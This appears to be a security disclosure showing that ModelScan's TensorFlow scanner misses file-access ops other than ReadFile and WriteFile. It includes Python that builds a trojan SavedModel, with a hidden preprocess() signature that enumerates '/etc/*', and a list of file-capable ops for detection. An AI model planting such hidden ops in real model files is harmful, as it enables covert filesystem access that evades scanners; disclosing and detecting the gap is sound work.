ModelScan TF SavedModel Scanner Bypass PoC
Finding: MFV-VULN-05
ModelScan's SavedModelTensorflowOpScan flags only two TensorFlow ops: ReadFile and WriteFile.
TensorFlow exposes 1,471 raw ops, 96 of which are file-related, so any other file-capable op
passes the scan untouched. This PoC demonstrates filesystem access from a SavedModel through
an unblocked op that ModelScan does not detect.
Proof
The trojan-classifier/ directory contains a TF SavedModel that:
- Appears normal: predict() performs standard image classification (a 784→10 dense layer)
- Hidden payload: preprocess() uses the MatchingFiles op to enumerate the filesystem

Ops in the model (from saved_model.pb):
- MatchingFiles → filesystem glob → NOT in ModelScan blocklist
- StringFormat → data formatting → NOT in ModelScan blocklist
- Standard ops: MatMul, Softmax, AddV2 (legitimate ML operations)
ModelScan result: CLEAN (no detections)
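The following is an added example, not the repository's huntr-tf-savedmodel-poc-v2.py: it inventories every op in a saved_model.pb (including the bodies of tf.function-traced functions, which live in the graph's FunctionDefLibrary rather than the top-level node list) and compares that inventory against ModelScan's two-op default blocklist and against a broader file-access op list. The glob pattern `/etc/*`, the `FILE_ACCESS_OPS` set (a hand-picked subset, not the page's full list of 96), and `SAMPLE_OPS` are constructed assumptions for illustration.

```python
"""Added example (not the PoC's own script): inventory SavedModel ops and show
what ModelScan's default two-op blocklist catches versus a broader file-op list."""
import os

# ModelScan's SavedModelTensorflowOpScan default blocklist, as stated on this page.
MODELSCAN_DEFAULT_BLOCKLIST = frozenset({"ReadFile", "WriteFile"})

# Constructed, hand-picked subset of TensorFlow raw ops that read or write the
# filesystem. This is an assumption for illustration, not the page's list of 96.
FILE_ACCESS_OPS = frozenset({
    "ReadFile", "WriteFile", "MatchingFiles",
    "Save", "SaveV2", "SaveSlices", "Restore", "RestoreV2", "RestoreSlice",
    "MergeV2Checkpoints", "ShardedFilename", "ShardedFilespec",
    "WholeFileReaderV2", "TextLineReaderV2", "TFRecordReaderV2",
    "FixedLengthRecordReaderV2", "TextLineDataset", "TFRecordDataset",
    "FixedLengthRecordDataset", "ImmutableConst",
})

# Constructed op inventory mirroring the trojan-classifier model described above.
SAMPLE_OPS = ["MatchingFiles", "StringFormat", "MatMul", "Softmax", "AddV2",
              "Const", "Identity", "ReadVariableOp"]


def classify_ops(op_names, blocklist=MODELSCAN_DEFAULT_BLOCKLIST):
    """Split an op inventory into: ops the blocklist catches, file-capable ops
    the blocklist misses, and everything else."""
    ops = set(op_names)
    blocked = ops & set(blocklist)
    missed = (ops & FILE_ACCESS_OPS) - blocked
    return {"blocked": blocked, "missed_file_ops": missed,
            "other": ops - blocked - missed}


def collect_ops(saved_model_pb_path):
    """Return every op name in saved_model.pb. tf.function bodies are stored in
    graph_def.library.function, not graph_def.node, so both are walked.
    Requires TensorFlow (imported lazily so the rest runs without it)."""
    from tensorflow.core.protobuf import saved_model_pb2
    sm = saved_model_pb2.SavedModel()
    with open(saved_model_pb_path, "rb") as f:
        sm.ParseFromString(f.read())
    ops = set()
    for mg in sm.meta_graphs:
        ops.update(n.op for n in mg.graph_def.node)
        for fn in mg.graph_def.library.function:
            ops.update(n.op for n in fn.node_def)
    return ops


def build_trojan(export_dir, pattern="/etc/*"):
    """Constructed trojan: a benign predict() signature plus a preprocess()
    signature whose body is a MatchingFiles op. The glob pattern is an
    assumption for illustration. Requires TensorFlow (imported lazily)."""
    import tensorflow as tf

    class Trojan(tf.Module):
        def __init__(self):
            super().__init__()
            self.w = tf.Variable(tf.random.normal([784, 10]))

        @tf.function(input_signature=[tf.TensorSpec([None, 784], tf.float32)])
        def predict(self, x):
            return tf.nn.softmax(tf.matmul(x, self.w))   # MatMul, Softmax

        @tf.function(input_signature=[])
        def preprocess(self):
            return tf.io.matching_files(pattern)          # MatchingFiles

    m = Trojan()
    tf.saved_model.save(m, export_dir,
                        signatures={"predict": m.predict, "preprocess": m.preprocess})
    return os.path.join(export_dir, "saved_model.pb")


if __name__ == "__main__":
    import sys
    # Pass a path to saved_model.pb to inventory a real model; otherwise use SAMPLE_OPS.
    ops = collect_ops(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_OPS
    for name, bl in (("ModelScan default", MODELSCAN_DEFAULT_BLOCKLIST),
                     ("file-access list", FILE_ACCESS_OPS)):
        r = classify_ops(ops, bl)
        print(f"{name}: blocked={sorted(r['blocked'])} "
              f"missed_file_ops={sorted(r['missed_file_ops'])}")
```

Against the constructed inventory, the default blocklist blocks nothing and misses MatchingFiles; the broader list flags it. Whatever op list a scanner uses, it has to walk the function library as well as the top-level graph, because a payload placed in a tf.function never appears in graph_def.node.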
Reproduction
```bash
pip install tensorflow
python3 huntr-tf-savedmodel-poc-v2.py build       # Creates trojan model
python3 huntr-tf-savedmodel-poc-v2.py verify      # Demonstrates filesystem enumeration
python3 huntr-tf-savedmodel-poc-v2.py scan-check  # Shows ModelScan misses the payload
```
Environment
- TensorFlow 2.20.0
- Python 3.13